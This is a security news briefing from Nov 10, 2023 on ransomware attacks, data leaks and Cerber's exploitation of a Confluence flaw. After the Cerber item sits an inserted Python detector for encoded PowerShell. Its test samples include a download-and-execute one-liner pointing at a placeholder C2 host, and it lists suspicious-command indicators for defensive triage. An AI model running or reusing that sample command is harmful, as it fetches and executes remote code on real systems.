Cyware Daily Threat Intelligence
Daily Threat Briefing • Nov 10, 2023
More threat groups are jumping on the bandwagon to exploit the controversial Atlassian Confluence Data Center and Server vulnerability. This time, it is Cerber ransomware. The attackers perform multi-stage attacks that could enable unauthorized users to create admin accounts with full privileges. On the brighter side of the evolving malicious landscape, a ransomware group has called off its operations, allegedly owing to increasing law enforcement pressure. It tried to sell its cybercrime infrastructure, but alas, there were no takers.
Meanwhile, a series of cyberattacks occurred in the past 24 hours, which crippled the systems of the world’s largest bank, a U.S. state government, and an American electronic components manufacturer. Security experts strongly attributed the attack on the bank to the LockBit group.
Data leaked on cybercrime forum
Dolly[.]com, a U.S.-based on-demand moving and delivery service, fell victim to a ransomware attack, compromising sensitive personal and financial data, such as credit card details. Despite reportedly paying the ransom, the cybercriminals deemed the amount insufficient, retaining both the money and the data. The attackers dumped the stolen data on a Russian-language cybercrime forum, including entry points for database instances. However, the downloadable files were later removed.
Online chess platform exploited
A threat actor leaked the scraped database of Chess[.]com, exposing personal data from 828,327 registered users on BreachForums. The compromised information includes full names, usernames, email addresses, profile links, originating countries, avatar URLs, UUIDs, and registration dates (with the latest sign-up in September). While the leaked data doesn't include passwords, the active and valid email addresses could be exploited for identity theft, phishing, or social engineering attacks.
MOVEit breach impacts Maine government
The Maine government confirmed that sensitive details of nearly 1.3 million residents were exposed in the cyberattack involving the MOVEit file transfer system. Stolen data includes names, dates of birth, SSNs, driver's licenses, and, in some cases, medical and health insurance details. Maine’s Department of Health and Human Services and the Department of Education were the most affected among various other agencies. The MOVEit mass hack, fixed by Progress Software in May, has so far affected over 2,500 organizations globally.
ICBC's U.S. arm hit by ransomware attack
The U.S. arm of the Industrial and Commercial Bank of China (ICBC) experienced a ransomware attack disrupting trades in the U.S. Treasury market. ICBC Financial Services, the U.S. unit of China's largest commercial lender, is investigating the incident, with experts suggesting the LockBit cybercrime group is likely behind the incident. While LockBit's dark web site didn't mention ICBC as a victim, the attack signifies an escalation in ransomware groups targeting major financial institutions.
Electronic components manufacturer compromised
Kyocera AVX Components Corporation (KAVX), an American electronic components manufacturer, reported a cybersecurity breach on March 30th, which led to the encryption of parts of its systems and temporary disruption in services. The incident affected the personal information of 39,111 individuals globally, with servers in South Carolina compromised. Unauthorized access occurred between February 16th and March 30th, 2023.
Cerber abuses Atlassian Confluence bug
Trend Micro observed the Cerber ransomware exploiting a critical vulnerability, CVE-2023-22518, in the Atlassian Confluence Data Center and Server. The flaw was initially thought to cause data loss but was later revealed to allow unauthorized users to reset and create administrator accounts with full privileges. In this campaign, Cerber runs a multi-step attack chain involving encoded PowerShell commands, connecting to a C2 server, downloading a malicious text file, and ultimately encrypting files on the compromised system. A PoC for the flaw was publicly leaked on November 2, 2023.
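One detection angle for the chain described above is the encoded PowerShell stage: the added example below (not from the briefing or from Trend Micro) scans constructed process command lines for the `-EncodedCommand` flag, decodes the Base64/UTF-16LE payload, and flags download-and-run behaviour for triage. The sample command lines, the indicator list and the host `c2.invalid` are assumptions for illustration.

```python
"""Detect and decode encoded PowerShell launches in process command lines.

Added example, not code from the Cyware briefing. Constructed sample command
lines are scanned for the -EncodedCommand / -enc flag, the Base64 payload is
decoded as UTF-16LE (the encoding PowerShell uses for that flag), and the
plaintext is checked for remote-download behaviour worth an analyst's look.
"""
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_FLAG = re.compile(r"(?i)(?:^|\s)[-/]e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")

# Assumed plaintext markers of "connect out and fetch a payload" behaviour.
SUSPICIOUS = ("DownloadString", "DownloadFile", "Invoke-WebRequest",
              "Net.WebClient", "Invoke-Expression", "IEX")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if cmdline carries an encoded command, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed Base64 or not UTF-16LE: not a valid -enc payload


def triage(cmdline: str) -> dict:
    """Classify one command line: was it encoded, what did it say, should it alert?"""
    decoded = decode_encoded_command(cmdline)
    hits = [s for s in SUSPICIOUS if decoded and s.lower() in decoded.lower()]
    return {"encoded": decoded is not None, "decoded": decoded,
            "indicators": hits, "alert": bool(hits)}


def build_sample(script: str) -> str:
    """Constructed test input: wrap a script the way an encoded launch would."""
    return "powershell.exe -nop -w hidden -enc " + base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed samples (not real telemetry): one download-and-run, one benign encoded, one plain.
SAMPLES = [
    build_sample("IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/p.txt')"),
    build_sample("Get-Process | Select-Object -First 5"),
    "powershell.exe -Command Get-Date",
]

if __name__ == "__main__":
    for s in SAMPLES:
        r = triage(s)
        print(r["alert"], r["indicators"], (r["decoded"] or "")[:60])
```

Feed real EDR or Sysmon event 1 command lines into `triage` instead of `SAMPLES`; the decoded text is what the analyst should read, since the Base64 form defeats simple string matching.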
Ransomed.vc no more!
Ransomware gang Ransomed.vc, known for attacks on Sony, a Hawaii state government website, and a supplier to Colonial Pipeline, claims to have shut down after six affiliates were allegedly arrested. The group initially emerged in August, threatening victims with European data breach fines. The hacker behind Ransomed.vc reportedly offered to sell the entire operation for around $10 million. In deleted Telegram messages, the individual cited the arrests as the reason for shutting down, expressing concern for the affiliates' lives.